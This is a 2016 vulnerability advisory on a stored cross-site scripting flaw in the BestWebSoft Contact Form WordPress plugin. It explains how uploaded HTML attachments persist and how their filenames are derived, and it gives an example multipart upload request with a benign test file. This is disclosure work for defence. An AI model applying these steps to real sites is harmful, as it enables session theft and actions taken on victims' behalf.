------------------------------------------------------------------------
Stored Cross-Site Scripting vulnerability in Contact Form WordPress
Plugin
------------------------------------------------------------------------
Julien Rentrop, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A stored Cross-Site Scripting vulnerability was found in the Contact
Form WordPress Plugin. This issue allows an attacker to perform a wide
variety of actions, such as stealing users' session tokens, or
performing arbitrary actions on their behalf. In order to exploit this
issue, the attacker has to lure/force a victim into opening a malicious
website/link.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160712-0042

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on Contact Form by BestWebSoft
WordPress Plugin version 4.0.0.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is partially resolved in Contact Form version 4.0.2.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
https://sumofpwn.nl/advisory/2016/stored_cross_site_scripting_vulnerability_in_contact_form_wordpress_plugin.html

When enabled an attachment can be uploaded in the contact form. The upload accepts html files which will be stored in the /wp-content/uploads directory. Since we can control the contents of this html file we can use this as a way to create a Cross-Site Scripting attack.

The attack here is possible since the validation fails and the unlink function which cleans up the file is not executed.

Tried to escalate this attack further by getting code execution (uploading php file), however this is defended by a white list.

Source file: https://plugins.svn.wordpress.org/contact-form-plugin/trunk/contact_form.php

When apache is configured to show directory listings it's easier to exploit this attack since we don't need to generate the file name. When directory listings is not enabled this attack should still be possible, since the file name is generated with this code:

md5( sanitize_file_name( $_FILES["cntctfrm_contact_attachment"]["name"] ) . time() . $email )

Only time of the server is not exactly known, but could be determined.
Proof of concept

#1 Manual (Or see example request):
Go to page with contact form, select a html file, set some invalid input (such as email: invalid@@@), send.

#2 Navigate to uploaded file:
http://<target>/wp-content/uploads/

#3 Example of stored file:
http://<target>/wp-content/uploads/2016/07/cntctfrm_a407baae7f961b445422446f75575e89_test.html

Request example:

POST / HTTP/1.1
Host: <target>
Content-Length: 605
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryPcjU2MvmAMp3t8r0
Connection: close
   
------WebKitFormBoundaryPcjU2MvmAMp3t8r0
Content-Disposition: form-data; name="cntctfrm_contact_attachment"; filename="test.html"
Content-Type: text/html
   
<html>
<body>
Hello world html
</body>
</html>
------WebKitFormBoundaryPcjU2MvmAMp3t8r0
Content-Disposition: form-data; name="cntctfrm_contact_action"
   
send
------WebKitFormBoundaryPcjU2MvmAMp3t8r0
Content-Disposition: form-data; name="cntctfrm_language"
   
default
------WebKitFormBoundaryPcjU2MvmAMp3t8r0--


------------------------------------------------------------------------
Summer of Pwnage (https://sumofpwn.nl) is a Dutch community project. Its
goal is to contribute to the security of popular, widely used OSS
projects in a fun and educational way.